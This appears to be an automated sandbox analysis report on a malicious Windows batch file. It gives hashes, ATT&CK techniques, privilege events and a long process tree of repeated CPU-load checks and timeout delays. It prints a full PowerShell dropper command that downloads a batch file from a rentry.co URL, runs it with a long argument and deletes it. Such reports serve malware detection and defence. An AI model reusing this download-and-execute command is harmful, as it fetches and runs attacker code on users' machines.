4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12

Analysis

max time kernel
134s
max time network
124s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
01-07-2024 03:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3000513059307.bat
Size

517B
MD5

ac9d73455d58bfa42f81e718b8c8d6b5
SHA1

60040fff333b7bc09b22e5c013f11b8a99555ed3
SHA256

4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12
SHA512

ad24994554a8e6bb68f5ca80b1c53379f7a577964165f56d2f6bef14340fec3d0f17d14faa2db4651776a83bd5686f26ee59080ee2a16d0468b8d38504e460b2

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://rentry.co/regele/raw

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2420 powershell.exe

pid	process
2420	powershell.exe

Delays execution with timeout.exe 64 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
2856	timeout.exe
2620	timeout.exe
624	timeout.exe
3036	timeout.exe
876	timeout.exe
2136	timeout.exe
2632	timeout.exe
2504	timeout.exe
844	timeout.exe
2352	timeout.exe
1796	timeout.exe
2972	timeout.exe
1784	timeout.exe
2888	timeout.exe
2672	timeout.exe
1488	timeout.exe
1660	timeout.exe
1608	timeout.exe
1440	timeout.exe
1664	timeout.exe
1620	timeout.exe
2328	timeout.exe
2572	timeout.exe
2640	timeout.exe
1652	timeout.exe
2116	timeout.exe
2996	timeout.exe
2184	timeout.exe
2016	timeout.exe
3060	timeout.exe
2392	timeout.exe
2144	timeout.exe
1784	timeout.exe
2696	timeout.exe
2640	timeout.exe
2588	timeout.exe
800	timeout.exe
2420	timeout.exe
2636	timeout.exe
2004	timeout.exe
748	timeout.exe
2204	timeout.exe
1568	timeout.exe
2736	timeout.exe
2924	timeout.exe
1496	timeout.exe
3044	timeout.exe
2852	timeout.exe
2140	timeout.exe
2500	timeout.exe
1640	timeout.exe
1800	timeout.exe
584	timeout.exe
1680	timeout.exe
2828	timeout.exe
1192	timeout.exe
2792	timeout.exe
2068	timeout.exe
2736	timeout.exe
2200	timeout.exe
888	timeout.exe
1620	timeout.exe
1728	timeout.exe
2364	timeout.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2420 powershell.exe

pid	process
2420	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeWMIC.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	2420	powershell.exe
Token: SeIncreaseQuotaPrivilege	1284	WMIC.exe
Token: SeSecurityPrivilege	1284	WMIC.exe
Token: SeTakeOwnershipPrivilege	1284	WMIC.exe
Token: SeLoadDriverPrivilege	1284	WMIC.exe
Token: SeSystemProfilePrivilege	1284	WMIC.exe
Token: SeSystemtimePrivilege	1284	WMIC.exe
Token: SeProfSingleProcessPrivilege	1284	WMIC.exe
Token: SeIncBasePriorityPrivilege	1284	WMIC.exe
Token: SeCreatePagefilePrivilege	1284	WMIC.exe
Token: SeBackupPrivilege	1284	WMIC.exe
Token: SeRestorePrivilege	1284	WMIC.exe
Token: SeShutdownPrivilege	1284	WMIC.exe
Token: SeDebugPrivilege	1284	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1284	WMIC.exe
Token: SeRemoteShutdownPrivilege	1284	WMIC.exe
Token: SeUndockPrivilege	1284	WMIC.exe
Token: SeManageVolumePrivilege	1284	WMIC.exe
Token: 33	1284	WMIC.exe
Token: 34	1284	WMIC.exe
Token: 35	1284	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1284	WMIC.exe
Token: SeSecurityPrivilege	1284	WMIC.exe
Token: SeTakeOwnershipPrivilege	1284	WMIC.exe
Token: SeLoadDriverPrivilege	1284	WMIC.exe
Token: SeSystemProfilePrivilege	1284	WMIC.exe
Token: SeSystemtimePrivilege	1284	WMIC.exe
Token: SeProfSingleProcessPrivilege	1284	WMIC.exe
Token: SeIncBasePriorityPrivilege	1284	WMIC.exe
Token: SeCreatePagefilePrivilege	1284	WMIC.exe
Token: SeBackupPrivilege	1284	WMIC.exe
Token: SeRestorePrivilege	1284	WMIC.exe
Token: SeShutdownPrivilege	1284	WMIC.exe
Token: SeDebugPrivilege	1284	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1284	WMIC.exe
Token: SeRemoteShutdownPrivilege	1284	WMIC.exe
Token: SeUndockPrivilege	1284	WMIC.exe
Token: SeManageVolumePrivilege	1284	WMIC.exe
Token: 33	1284	WMIC.exe
Token: 34	1284	WMIC.exe
Token: 35	1284	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2788	WMIC.exe
Token: SeSecurityPrivilege	2788	WMIC.exe
Token: SeTakeOwnershipPrivilege	2788	WMIC.exe
Token: SeLoadDriverPrivilege	2788	WMIC.exe
Token: SeSystemProfilePrivilege	2788	WMIC.exe
Token: SeSystemtimePrivilege	2788	WMIC.exe
Token: SeProfSingleProcessPrivilege	2788	WMIC.exe
Token: SeIncBasePriorityPrivilege	2788	WMIC.exe
Token: SeCreatePagefilePrivilege	2788	WMIC.exe
Token: SeBackupPrivilege	2788	WMIC.exe
Token: SeRestorePrivilege	2788	WMIC.exe
Token: SeShutdownPrivilege	2788	WMIC.exe
Token: SeDebugPrivilege	2788	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2788	WMIC.exe
Token: SeRemoteShutdownPrivilege	2788	WMIC.exe
Token: SeUndockPrivilege	2788	WMIC.exe
Token: SeManageVolumePrivilege	2788	WMIC.exe
Token: 33	2788	WMIC.exe
Token: 34	2788	WMIC.exe
Token: 35	2788	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2788	WMIC.exe
Token: SeSecurityPrivilege	2788	WMIC.exe
Token: SeTakeOwnershipPrivilege	2788	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2428 wrote to memory of 2420	2428	cmd.exe	powershell.exe
PID 2428 wrote to memory of 2420	2428	cmd.exe	powershell.exe
PID 2428 wrote to memory of 2420	2428	cmd.exe	powershell.exe
PID 2428 wrote to memory of 2336	2428	cmd.exe	cmd.exe
PID 2428 wrote to memory of 2336	2428	cmd.exe	cmd.exe
PID 2428 wrote to memory of 2336	2428	cmd.exe	cmd.exe
PID 2336 wrote to memory of 1284	2336	cmd.exe	WMIC.exe
PID 2336 wrote to memory of 1284	2336	cmd.exe	WMIC.exe
PID 2336 wrote to memory of 1284	2336	cmd.exe	WMIC.exe
PID 2428 wrote to memory of 2640	2428	cmd.exe	timeout.exe
PID 2428 wrote to memory of 2640	2428	cmd.exe	timeout.exe
PID 2428 wrote to memory of 2640	2428	cmd.exe	timeout.exe
PID 2428 wrote to memory of 2632	2428	cmd.exe	cmd.exe
PID 2428 wrote to memory of 2632	2428	cmd.exe	cmd.exe
PID 2428 wrote to memory of 2632	2428	cmd.exe	cmd.exe
PID 2632 wrote to memory of 2788	2632	cmd.exe	WMIC.exe
PID 2632 wrote to memory of 2788	2632	cmd.exe	WMIC.exe
PID 2632 wrote to memory of 2788	2632	cmd.exe	WMIC.exe
PID 2428 wrote to memory of 2852	2428	cmd.exe	timeout.exe
PID 2428 wrote to memory of 2852	2428	cmd.exe	timeout.exe
PID 2428 wrote to memory of 2852	2428	cmd.exe	timeout.exe
PID 2428 wrote to memory of 2828	2428	cmd.exe	cmd.exe
PID 2428 wrote to memory of 2828	2428	cmd.exe	cmd.exe
PID 2428 wrote to memory of 2828	2428	cmd.exe	cmd.exe
PID 2828 wrote to memory of 2764	2828	cmd.exe	WMIC.exe
PID 2828 wrote to memory of 2764	2828	cmd.exe	WMIC.exe
PID 2828 wrote to memory of 2764	2828	cmd.exe	WMIC.exe
PID 2428 wrote to memory of 2736	2428	cmd.exe	timeout.exe
PID 2428 wrote to memory of 2736	2428	cmd.exe	timeout.exe
PID 2428 wrote to memory of 2736	2428	cmd.exe	timeout.exe
PID 2428 wrote to memory of 2572	2428	cmd.exe	cmd.exe
PID 2428 wrote to memory of 2572	2428	cmd.exe	cmd.exe
PID 2428 wrote to memory of 2572	2428	cmd.exe	cmd.exe
PID 2572 wrote to memory of 2516	2572	cmd.exe	WMIC.exe
PID 2572 wrote to memory of 2516	2572	cmd.exe	WMIC.exe
PID 2572 wrote to memory of 2516	2572	cmd.exe	WMIC.exe
PID 2428 wrote to memory of 2588	2428	cmd.exe	timeout.exe
PID 2428 wrote to memory of 2588	2428	cmd.exe	timeout.exe
PID 2428 wrote to memory of 2588	2428	cmd.exe	timeout.exe
PID 2428 wrote to memory of 2636	2428	cmd.exe	cmd.exe
PID 2428 wrote to memory of 2636	2428	cmd.exe	cmd.exe
PID 2428 wrote to memory of 2636	2428	cmd.exe	cmd.exe
PID 2636 wrote to memory of 2684	2636	cmd.exe	WMIC.exe
PID 2636 wrote to memory of 2684	2636	cmd.exe	WMIC.exe
PID 2636 wrote to memory of 2684	2636	cmd.exe	WMIC.exe
PID 2428 wrote to memory of 2140	2428	cmd.exe	timeout.exe
PID 2428 wrote to memory of 2140	2428	cmd.exe	timeout.exe
PID 2428 wrote to memory of 2140	2428	cmd.exe	timeout.exe
PID 2428 wrote to memory of 2964	2428	cmd.exe	cmd.exe
PID 2428 wrote to memory of 2964	2428	cmd.exe	cmd.exe
PID 2428 wrote to memory of 2964	2428	cmd.exe	cmd.exe
PID 2964 wrote to memory of 1292	2964	cmd.exe	WMIC.exe
PID 2964 wrote to memory of 1292	2964	cmd.exe	WMIC.exe
PID 2964 wrote to memory of 1292	2964	cmd.exe	WMIC.exe
PID 2428 wrote to memory of 1796	2428	cmd.exe	timeout.exe
PID 2428 wrote to memory of 1796	2428	cmd.exe	timeout.exe
PID 2428 wrote to memory of 1796	2428	cmd.exe	timeout.exe
PID 2428 wrote to memory of 1800	2428	cmd.exe	cmd.exe
PID 2428 wrote to memory of 1800	2428	cmd.exe	cmd.exe
PID 2428 wrote to memory of 1800	2428	cmd.exe	cmd.exe
PID 1800 wrote to memory of 2804	1800	cmd.exe	WMIC.exe
PID 1800 wrote to memory of 2804	1800	cmd.exe	WMIC.exe
PID 1800 wrote to memory of 2804	1800	cmd.exe	WMIC.exe
PID 2428 wrote to memory of 2004	2428	cmd.exe	timeout.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\3000513059307.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2428

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://rentry.co/regele/raw', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
- Suspicious use of WriteProcessMemory
PID:2336

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1284

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
- Suspicious use of WriteProcessMemory
PID:2632

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2788

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
- Suspicious use of WriteProcessMemory
PID:2828

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2764

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
- Suspicious use of WriteProcessMemory
PID:2572

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2516

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
- Suspicious use of WriteProcessMemory
PID:2636

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2684

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
- Suspicious use of WriteProcessMemory
PID:2964

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1292

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
- Suspicious use of WriteProcessMemory
PID:1800

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2804

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2004

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2504

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1772

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:624

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2252

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1832

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2492

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2576

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2752

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1664

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2940

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2944

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2320

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2308

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:536

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:332

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2312

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1676

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2380

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:688

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2496

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1912

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1540

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1524

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3016

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1848

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:828

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1632

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3008

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2064

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:976

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2192

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2020

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1040

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1592

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1584

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2996

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3004

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2480

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2204

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2176

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1400

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2936

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2620

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2644

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2672

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2640

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2776

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2852

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2688

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1736

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2628

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2588

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2560

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2140

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:812

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:992

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1952

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2004

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1720

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1992

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1456

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1612

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2820

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1532

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1776

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2924

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2836

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1264

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2112

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2056

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:988

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:980

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1856

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1860

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2472

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2476

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2052

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1392

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1356

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1920

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3056

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1864

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1084

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:892

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:612

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:940

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:760

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2280

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2144

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2164

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1704

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1040

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2020

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1584

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1592

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2452

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1940

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2200

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1968

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2204

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3060

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2132

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2068

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2360

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1284
